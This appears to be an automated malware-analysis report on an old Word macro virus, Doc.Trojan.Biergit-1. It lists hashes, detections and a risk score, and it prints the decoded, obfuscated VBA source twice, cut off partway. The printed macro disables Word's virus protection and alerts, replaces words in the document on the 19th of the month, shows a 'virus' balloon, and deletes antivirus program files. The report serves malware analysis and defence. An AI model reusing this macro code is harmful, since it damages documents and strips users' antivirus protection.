Office (OLE) malware analysis — malicious · adbe029bce0a97ad

MALICIOUS

Office (OLE)

42.5 KB Created: 1999-06-14 17:39:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: f3f03f7310ed781281f016e6e0d6500c SHA-1: dae5589a5ab5c028da93e6f25d3c1e84bfe25ff4 SHA-256: adbe029bce0a97ad780947d5fdde2a2a6fb63ad2f9d6bb1403bf6c785d1c3a22

80 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample is a Microsoft Word document containing VBA macros, identified by ClamAV as Doc.Trojan.Biergit-1. The VBA script attempts to manipulate document settings and displays a message box in German, suggesting a social engineering lure. The script's obfuscated nature and the presence of macros indicate a malicious intent, likely to deceive the user or download further malicious content.

Heuristics 2

ClamAV: Doc.Trojan.Biergit-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Biergit-1
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7562 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	7562 bytes
SHA-256: `5bd2eb1f970e4d4ddd26db2aafacc65468cd5cab41c394d33b9bc4d560f4095d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Birgit" Sub VnFoTh6416() KxPxJhRyTnPpNfEoEt = VlMhJuBiPoIzTlBfMp & CoOgVlGxLjBmLpSkHf11772805 On Error Resume Next MfDxHjUiVxChImOfRq = AoEhEyMzIoJvRhAgMu & DlAwSmGiOfAgViIqRx26722063 WordBasic.DisableAutoMacros 0 UvSpRrKvPnMuAmHqJi = SzIiSoAyOvJpPiVeNm & UeIpHtCrEeKxSxDvMh43321609 ActiveDocument.ReadOnlyRecommended = False BzHoOuNfRyVnRtSiBf = UgAiNsKtIvKlNeUeMq & VxPjEuCxIwJrGqOfBy5828867 With Application DhSoMwQmTmIfMeHvPy = AjOjIwVnCvLhLvTeLv & AuAzBuDiLsImRkElLu7323125 .EnableCancelKey = wdCancelDisabled MxKgAjHyMyTsEeVkGr = RtRkAnJnIgLxJxTyMm & RmItMgVrBrShOyVpGe89839671 .DisplayAlerts = wdAlertsNone OfVgUlKjPmGkVlKxUo = TxJkRrThBgMtHsSyMr & SjQnJhVxFnRxCsKvQw4808928 End With AwOuItAvIyQxNlDmMg = PlMmJiHhHnNnEuSwNj & OyBgVoRkQmFsVkFeLg21408475 With Options DzDtGwDgKnDpIsOeEz = RoEmEmSxBnOjDpRwMn & PvJwRpSrUiEmJeRkAy36357733 .ConfirmConversions = False FhNtDyGmMxMiDzDrSw = SsSmAqGsQmPfBlQxLs & PsQqOpSxBeDgTtGqKu51316991 .VirusProtection = False NxGlOkTzGnBvRzRgJp = OgVnNhQsAtPvUmQvMj & LlCkExOkNzNxQmBvFe67916537 End With QfRlLnAjIxKnMkGtBm = QjNoIlFmQtQrTiPvMo & MiJeAyOrRvMrEfNfPw82865795 If Day(Now()) = 19 Then CwJzAvMwBnVeEkUiPe = LuQpAxPmAeQlQjPtNg & HwRtMjLeGuAmBuIkKg99465341 MsgBox "Wo versteckst Du dich, Birgit?", vbOkOnly, "Birgit" FzUyTyPgEyHsVrJwGx = NxJpRfDgPeRhOfOtMk & ItDnJkLlKqVgLnTqVy14434599 With Selection.Find HhJyReSnGmQkQyUnUv = PeBpNjOxJeSzNwNtLp & JqKiFkLrOmTxAhJwJu29383857 .Text = "blau" PyCqFmJzVyFxIyNyMn = LpErEwCwPlStKyMrMg & EjSxRsHeDlIsTvEeEe45983403 .Replacement.Text = "gelb" PlEfMlUfIwTyDwRjFf = SeRgIvRwAvEfSsFoUf & FuAxGiSmJgAfFxPxFh4779355 .Wrap = wdFindContinue BgTtAtLsBmIpRwKuTu = OpUhAmFwGgEvQuFmVs & BnIqRqOvVfKwCqKgAn64399901 End With EjItTwOyDxRhMhVlKr = PsMiRqPqAgFrOpEmUx & BkQkOqPgCxJqMjVmKj79359159 Selection.Find.Execute Replace:=wdReplaceAll MeBlIiFpSmGuFhNxCj = LgPjJhDqGnFlLqEkVo & TyBeDyLpOwTlJyQqFp95958705 ActiveDocument.SaveAs ActiveDocument.FullName OiLlFlIvVxOmAoCoQg = NkHjElOkVnGhKmDkUt & UvJuAzLwSsSfTrGwQl10917963 ' Drucker-Payload! Assistant.Visible = True RlAkDnKgBlBfQvNfIz = PnVjVpDfPnHzIiCkUy & VsQoTzMgVoQvHlRhEh25877221 With Assistant.NewBalloon DgPyNvBsQxMsJvFqVs = KxDlNgMeVuHtFjCiVp & QlChIlIpLnFqEzMlVn42476767 .Icon = msoIconAlert GkEyLyEzTmVkEgQhNp = MfRlIkBvPuIpEfBjUu & RiJxFlIwPjDkPtCrKi57426025 .Text = "Sorry, ich bin ein Virus..." OeSqVkRpMxKxSgJtFh = IpUnAwLuUeJjBgBgVl & MwRrRtEjEiOfLlTwFo74025571 .Heading = "B I R G I T" QiHqTmUwOmTpNnUkTe = KsMnReApOeKfVyAhUq & NtDlNuFpIeNvAfIgPk88984829 .Animation = msoAnimationSearching TlSpQpBgQwFhIuJxKy = MwEnMiKkIeLxUtVhTu & OqKfKuFwLwLqKuUmDg3954087 .Show FgLhFxNtKmQvAuBmCq = HkHoEvUjOlLrRvUfVm & JjSuAgBjBvAlHnPrUm20543633 End With IkVhCeQzMxDnRfMzQn = JnVoVzJeHlMnPqTfUr & KgDoTgBpFrUfRhExJi35502891 Assistant.Visible = False QeOvMmHqFmOeJeFpIf = FyCqNqTzNsMhNrTzVi & FuLiIoTzQqJwOvAfEo52102437 Call FjPoCr1108 SiDvKoKwIxBsElPgVy = GfQqIuHuHsNzLnSzUn & GsSyFpUjUmHqCpLmOk67061695 End If VmOuIrNhKlJkVtEtNw = IiIqEySoBsOvJjReTr & HpEsCpUqCiGkMiBsCg8201953 End Sub Sub FjPoCr1108() HgGmSzDtDxUxNsTiFo = EtLsRpGoGzOpHkRyUj & DhMlNxQzNhQfJxSwTm9861500 On Error Resume Next JkRmQfGeFlHpIzIvTl = GwDsNtQiAzPlFgQyUo & DeTfKxRjRzPvTqHgIi13589757 Kill ("C:\PROGRAMME\MCAFEE\VIRUSSCAN\.") SfKeEoTqVxShAzAkKz = BkHtEkEiGjQfChQwVf & VtFvVjNsGyEqQjClDo30189303 Kill ("C:\PROGRAMME\MCAFEE\VIRUSSCAN95\.") UiVeBqAxBmFvRkLyCx = DoVtVnPyAjRxBzPwUk & AqMpSkNzKuCkFyOrNk45138561 Kill ("C:\Programme\Dr Solomon's\Anti-Virus Toolkit\.") BmJzVtDhDwNnMrApQu = FrNuRrDtPjStVuOwTo & AnUjPkNjOqBfPsDxBg60097819 Kill ("C:\PROGRAMME\TBAV\TBAV.DAT") JhCrJfPuSmCeErPeIm = BfQvIiNsVqSnSwNuUg & SfFyEsJsDpLwMkUgTm76697365 Kill ("C:\TBAV\TBAV.DAT") LkNrHhSeVwLsVyErVj = CjIvEmCnPqTjRrMuUl & TyNsBsKzHlKqAeKmHi91646623 ... (truncated)

SHA-256: 5bd2eb1f970e4d4ddd26db2aafacc65468cd5cab41c394d33b9bc4d560f4095d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Birgit"
Sub VnFoTh6416()

KxPxJhRyTnPpNfEoEt = VlMhJuBiPoIzTlBfMp & CoOgVlGxLjBmLpSkHf11772805
On Error Resume Next
MfDxHjUiVxChImOfRq = AoEhEyMzIoJvRhAgMu & DlAwSmGiOfAgViIqRx26722063
WordBasic.DisableAutoMacros 0
UvSpRrKvPnMuAmHqJi = SzIiSoAyOvJpPiVeNm & UeIpHtCrEeKxSxDvMh43321609
ActiveDocument.ReadOnlyRecommended = False
BzHoOuNfRyVnRtSiBf = UgAiNsKtIvKlNeUeMq & VxPjEuCxIwJrGqOfBy5828867
With Application
DhSoMwQmTmIfMeHvPy = AjOjIwVnCvLhLvTeLv & AuAzBuDiLsImRkElLu7323125
.EnableCancelKey = wdCancelDisabled
MxKgAjHyMyTsEeVkGr = RtRkAnJnIgLxJxTyMm & RmItMgVrBrShOyVpGe89839671
.DisplayAlerts = wdAlertsNone
OfVgUlKjPmGkVlKxUo = TxJkRrThBgMtHsSyMr & SjQnJhVxFnRxCsKvQw4808928
End With
AwOuItAvIyQxNlDmMg = PlMmJiHhHnNnEuSwNj & OyBgVoRkQmFsVkFeLg21408475
With Options
DzDtGwDgKnDpIsOeEz = RoEmEmSxBnOjDpRwMn & PvJwRpSrUiEmJeRkAy36357733
.ConfirmConversions = False
FhNtDyGmMxMiDzDrSw = SsSmAqGsQmPfBlQxLs & PsQqOpSxBeDgTtGqKu51316991
.VirusProtection = False
NxGlOkTzGnBvRzRgJp = OgVnNhQsAtPvUmQvMj & LlCkExOkNzNxQmBvFe67916537
End With
QfRlLnAjIxKnMkGtBm = QjNoIlFmQtQrTiPvMo & MiJeAyOrRvMrEfNfPw82865795
If Day(Now()) = 19 Then
CwJzAvMwBnVeEkUiPe = LuQpAxPmAeQlQjPtNg & HwRtMjLeGuAmBuIkKg99465341
MsgBox "Wo versteckst Du dich, Birgit?", vbOkOnly, "Birgit"
FzUyTyPgEyHsVrJwGx = NxJpRfDgPeRhOfOtMk & ItDnJkLlKqVgLnTqVy14434599
With Selection.Find
HhJyReSnGmQkQyUnUv = PeBpNjOxJeSzNwNtLp & JqKiFkLrOmTxAhJwJu29383857
.Text = "blau"
PyCqFmJzVyFxIyNyMn = LpErEwCwPlStKyMrMg & EjSxRsHeDlIsTvEeEe45983403
.Replacement.Text = "gelb"
PlEfMlUfIwTyDwRjFf = SeRgIvRwAvEfSsFoUf & FuAxGiSmJgAfFxPxFh4779355
.Wrap = wdFindContinue
BgTtAtLsBmIpRwKuTu = OpUhAmFwGgEvQuFmVs & BnIqRqOvVfKwCqKgAn64399901
End With
EjItTwOyDxRhMhVlKr = PsMiRqPqAgFrOpEmUx & BkQkOqPgCxJqMjVmKj79359159
Selection.Find.Execute Replace:=wdReplaceAll
MeBlIiFpSmGuFhNxCj = LgPjJhDqGnFlLqEkVo & TyBeDyLpOwTlJyQqFp95958705
ActiveDocument.SaveAs ActiveDocument.FullName
OiLlFlIvVxOmAoCoQg = NkHjElOkVnGhKmDkUt & UvJuAzLwSsSfTrGwQl10917963
' Drucker-Payload!
Assistant.Visible = True
RlAkDnKgBlBfQvNfIz = PnVjVpDfPnHzIiCkUy & VsQoTzMgVoQvHlRhEh25877221
With Assistant.NewBalloon
DgPyNvBsQxMsJvFqVs = KxDlNgMeVuHtFjCiVp & QlChIlIpLnFqEzMlVn42476767
.Icon = msoIconAlert
GkEyLyEzTmVkEgQhNp = MfRlIkBvPuIpEfBjUu & RiJxFlIwPjDkPtCrKi57426025
.Text = "Sorry, ich bin ein Virus..."
OeSqVkRpMxKxSgJtFh = IpUnAwLuUeJjBgBgVl & MwRrRtEjEiOfLlTwFo74025571
.Heading = "B I R G I T"
QiHqTmUwOmTpNnUkTe = KsMnReApOeKfVyAhUq & NtDlNuFpIeNvAfIgPk88984829
.Animation = msoAnimationSearching
TlSpQpBgQwFhIuJxKy = MwEnMiKkIeLxUtVhTu & OqKfKuFwLwLqKuUmDg3954087
.Show
FgLhFxNtKmQvAuBmCq = HkHoEvUjOlLrRvUfVm & JjSuAgBjBvAlHnPrUm20543633
End With
IkVhCeQzMxDnRfMzQn = JnVoVzJeHlMnPqTfUr & KgDoTgBpFrUfRhExJi35502891
Assistant.Visible = False
QeOvMmHqFmOeJeFpIf = FyCqNqTzNsMhNrTzVi & FuLiIoTzQqJwOvAfEo52102437
Call FjPoCr1108
SiDvKoKwIxBsElPgVy = GfQqIuHuHsNzLnSzUn & GsSyFpUjUmHqCpLmOk67061695
End If
VmOuIrNhKlJkVtEtNw = IiIqEySoBsOvJjReTr & HpEsCpUqCiGkMiBsCg8201953
End Sub
Sub FjPoCr1108()
HgGmSzDtDxUxNsTiFo = EtLsRpGoGzOpHkRyUj & DhMlNxQzNhQfJxSwTm9861500
On Error Resume Next
JkRmQfGeFlHpIzIvTl = GwDsNtQiAzPlFgQyUo & DeTfKxRjRzPvTqHgIi13589757
Kill ("C:\PROGRAMME\MCAFEE\VIRUSSCAN\*.*")
SfKeEoTqVxShAzAkKz = BkHtEkEiGjQfChQwVf & VtFvVjNsGyEqQjClDo30189303
Kill ("C:\PROGRAMME\MCAFEE\VIRUSSCAN95\*.*")
UiVeBqAxBmFvRkLyCx = DoVtVnPyAjRxBzPwUk & AqMpSkNzKuCkFyOrNk45138561
Kill ("C:\Programme\Dr Solomon's\Anti-Virus Toolkit\*.*")
BmJzVtDhDwNnMrApQu = FrNuRrDtPjStVuOwTo & AnUjPkNjOqBfPsDxBg60097819
Kill ("C:\PROGRAMME\TBAV\TBAV.DAT")
JhCrJfPuSmCeErPeIm = BfQvIiNsVqSnSwNuUg & SfFyEsJsDpLwMkUgTm76697365
Kill ("C:\TBAV\TBAV.DAT")
LkNrHhSeVwLsVyErVj = CjIvEmCnPqTjRrMuUl & TyNsBsKzHlKqAeKmHi91646623
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.